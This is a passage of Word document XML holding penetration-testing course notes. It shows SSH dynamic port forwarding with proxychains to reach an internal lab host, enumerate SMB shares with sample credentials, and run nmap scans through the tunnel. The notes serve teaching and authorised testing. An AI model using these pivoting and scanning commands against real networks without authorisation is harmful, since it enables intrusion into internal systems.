      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/etc/proxychains4.conf</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000894">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We need to edit this file to ensure that Proxychains can locate our SOCKS proxy port and confirm that it's a SOCKS proxy (rather than any other kind of proxy). </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000895">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000896">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">By default, proxies are defined at the end of the file</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. We can </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">simply replace any existing proxy </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">definition in that file with a single line defining the proxy type, IP address, and port of the SOCKS proxy running on CONFLUENCE01 (</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">socks5 192.168.50.63 9999</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000897">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000898">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">After editing the file (</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ON OUR KALI MACHINE)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, it should appear as follows:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000899">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="2171700"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="298" name="image297.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image297.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId18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89A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="115"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We run this on </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">our Kali Machine to connect to the SOCKS5 proxy on CONFLUNCE01 that was opened using the SSH -d command</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000089B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="115"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">tail /etc/proxychains4.conf</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000089C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="115"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">socks5 192.168.50.63 9999</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000089D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="115"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The IP address belongs to CONFLUENCE01</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000089E">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000089F">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">What this does is that we now are connected to the SOCKS5 proxy on CONFLUENCE01 (port 9999). </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We are only connected to the proxy whenever we use the proxychains command</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000008A0">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000008A1">
      <w:pPr>
        <w:spacing w:after="240" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">With Proxychains properly configured, we can use smbclient from our Kali machine to enumerate available shares on HRSHARES.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000008A2">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We can simply prepend </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">proxychains</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to the command. Proxychains will read the configuration file, hook into the smbclient process, and force all traffic through the SOCKS proxy we specified.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000008A3">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We can now write commands targeting the HRSHARES IP directly, not CONFLUENCE01 or PGDATBASE01. This is because we are writing the commands as if we have are PGDATABASE01 (the SSH Server)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000008A4">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">proxychains smbclient -L //172.16.50.217/ -U hr_admin --password=Welcome1234</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000008A5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1264"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Rather than connecting to the port on CONFLUENCE01, we'll write the smbclient command as though we have a direct connection to PGDATABASE01</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000008A6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1264"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">172.16.50.217</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> belongs to HRSHARES, the target machine in the INTERNAL Subnet</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000008A7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1264"/>
        </w:numPr>
        <w:spacing w:after="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">As before, we will specify </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-L</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to list the available shares, pass the username with </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-U</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, and password with </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">--password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8A8">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000008A9">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">INFO: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Although we specify socks5 in this example, it could also be socks4, since SSH supports both. SOCKS5 supports authentication, IPv6, and User Datagram Protocol (UDP), including DNS. Some SOCKS proxies will only support the SOCKS4 protocol. Make sure you check which version is supported by the SOCKS server when using SOCKS proxies in engagements.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000008AA">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000008AB">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How does a proxy work?:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000008AC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="252"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Sending traffic to the proxy (not directly to the final destination)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000008AD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="252"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The proxy then forwards that traffic to the actual target</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000008AE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="252"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The response comes back through the proxy, and then to you</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000008AF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="252"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">So your machine only ever talks to the proxy, and the proxy does the rest.</w:t>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rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Another example, this time with nmap:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000008B2">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo proxychains nmap -vvv -sT --top-ports=20 -Pn 172.16.50.217</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000008B3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="77"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Again, we specify </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">172.16.50.217</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> which is the IP of the target machine HRSHARES</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000008B4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="77"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We must specify</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> -sT </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">to perform a TCP connect scan. Otherwise, Nmap will not work over Proxychains.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000008B5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="77"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And we use the proxychains command</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000008B6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="77"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And since we can access multiple ports using dynamic port forwarding, we can do a full NMAP scan allowing us to look at multiple ports. Local and remote port forwarding can't do this</w:t>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t xml:space="preserve">Note:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000008B9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1138"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You can scan multiple IP with one nmap command, like below:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000008BA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1138"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo proxychains -q nmap -sT -oN nmap_servers -Pn -p 21,80,443 </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">172.16.6.240 172.16.6.241 172.16.6.254</w:t>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t xml:space="preserve">By default, Proxychains is configured with very high time-out values. This can make port scanning really slow. Lowering the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">tcp_read_time_out</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">tcp_connect_time_out</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> values in the Proxychains configuration file will force Proxychains to time-out on non-responsive connections more quickly. This can dramatically speed up port-scanning times.</w:t>
      </w:r>
    </w:p>
